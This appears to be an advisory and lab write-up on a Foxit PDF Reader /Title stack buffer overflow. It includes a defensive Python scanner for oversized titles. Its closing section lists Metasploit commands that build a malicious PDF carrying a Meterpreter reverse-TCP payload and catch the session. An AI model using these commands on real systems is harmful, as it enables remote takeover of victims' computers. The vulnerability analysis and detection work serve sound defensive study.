Timeline :
Vulnerability reported to vendor by offsec before the public release on Exploit-DB
Vendor released a new version on 2010-09-29
dookie & Sud0 exploit released on Exploit-DB on 2010-11-13
Metasploit exploit released on 2010-11-22
PoC provided by :
dookie
Sud0
corelanc0d3r
jduck
Reference(s) :
Affected version(s) :
Foxit PDF Reader prior to version 4.2.0.0928
Tested on Windows 7 Integral with :
Foxit PDF Reader 4.1.1.0805
Description :
This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field of the document's Info dictionary. The overflow overwrites a structured exception handler (SEH) record on the stack. NOTE: This exploit does not use JavaScript.
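Because the trigger is nothing more than an oversized /Title string in the PDF Info dictionary, a file-level check can flag such documents before a vulnerable reader opens them. The following Python script is an added example written for this post, not code from the Metasploit module or from Foxit; it parses every /Title entry (literal and hex strings, including nested parentheses) and reports any longer than a threshold. The 256-byte limit and the two embedded sample PDFs are constructed assumptions for the example; the advisory gives no exact length.

```python
import re

# Assumed threshold for this example: the advisory only says "overly long".
# Real document titles are rarely more than a couple of hundred bytes.
MAX_TITLE_LEN = 256


def _read_literal_string(data: bytes, start: int) -> bytes:
    """Read a PDF literal string beginning at data[start] == b'('.

    Handles balanced nested parentheses and backslash escapes; returns the raw
    bytes between the outer parentheses (escapes are kept, so the length is an
    upper bound, which is what we want for a size check)."""
    depth = 0
    i = start
    out = bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":               # escape: copy both bytes verbatim
            out += data[i:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += c
        else:
            out += c
        i += 1
    return bytes(out)                # unterminated string: report what we saw


def _read_hex_string(data: bytes, start: int) -> bytes:
    """Read a PDF hex string beginning at data[start] == b'<'."""
    end = data.find(b">", start)
    if end == -1:
        end = len(data)
    digits = re.sub(rb"\s+", b"", data[start + 1:end])
    if len(digits) % 2:              # PDF pads an odd final digit with 0
        digits += b"0"
    try:
        return bytes.fromhex(digits.decode("ascii"))
    except ValueError:
        return data[start + 1:end]   # malformed hex: fall back to raw bytes


def find_titles(pdf: bytes):
    """Return [(offset, title_bytes)] for every uncompressed /Title entry."""
    titles = []
    for m in re.finditer(rb"/Title\s*", pdf):
        pos = m.end()
        if pos >= len(pdf):
            break
        c = pdf[pos:pos + 1]
        if c == b"(":
            titles.append((m.start(), _read_literal_string(pdf, pos)))
        elif c == b"<" and pdf[pos:pos + 2] != b"<<":
            titles.append((m.start(), _read_hex_string(pdf, pos)))
    return titles


def check_pdf(pdf: bytes, max_len: int = MAX_TITLE_LEN):
    """Return a list of findings; an empty list means no oversized /Title."""
    findings = []
    for off, title in find_titles(pdf):
        if len(title) > max_len:
            findings.append(
                f"oversized /Title at offset {off}: {len(title)} bytes (limit {max_len})"
            )
    return findings


def make_sample_pdf(title: bytes) -> bytes:
    """Constructed minimal PDF with an Info dictionary (xref table omitted)."""
    return (b"%PDF-1.4\n"
            b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
            b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
            b"3 0 obj\n<< /Title (" + title + b") /Producer (example) >>\nendobj\n"
            b"trailer\n<< /Root 1 0 R /Info 3 0 R >>\n%%EOF\n")


# Constructed samples: a normal title (with nested parentheses) and a 2000-byte one.
BENIGN = make_sample_pdf(b"Quarterly report (draft)")
SUSPECT = make_sample_pdf(b"A" * 2000)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, check_pdf(doc) or ["ok"])
```

The scan is a plain byte search, so it only sees Info dictionaries stored uncompressed in the file body; a /Title inside an object stream (PDF 1.5+) would need the stream inflated first. That limitation is fine for a quick triage of a suspicious sample, and it is the same field the vendor's fix (4.2.0.0928) had to bound-check.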
Commands :
use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sysinfo
getuid